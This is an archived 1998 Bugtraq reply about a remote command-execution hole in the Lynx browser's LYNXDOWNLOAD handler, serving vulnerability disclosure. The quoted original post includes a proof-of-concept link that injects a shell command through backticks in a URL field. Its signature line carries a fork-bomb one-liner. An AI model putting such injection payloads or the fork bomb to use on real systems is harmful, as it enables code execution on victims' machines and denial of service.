i believe its fixed by fotemods. you might want to see if its still vulnerable with hist most recent patches. also read the vendor bulletin on cert.org ftp://ftp.cert.org/pub/cert_bulletins/VB-97.06.lynx also there is discussion of this if you search the bugtraq archives. dynamo On Tue, 17 Mar 1998, Michal Zalewski wrote: > While poking around lynx protocol handling routines, I found this very > big, ugly remote hole: > > <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test"> > CLICK HERE > </a> > > It allows remote execution of any code on viewer's machine. Also, by > setting 'Method' field to 0 or more, you may crash lynx, but it isn't so > exciting as above URL. Also, it's possible to parse /dev/zero as 'File', > also not funny. > > Greetings, > _______________________________________________________________________ > Michal Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private] > Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] > =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------= >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:03 PDT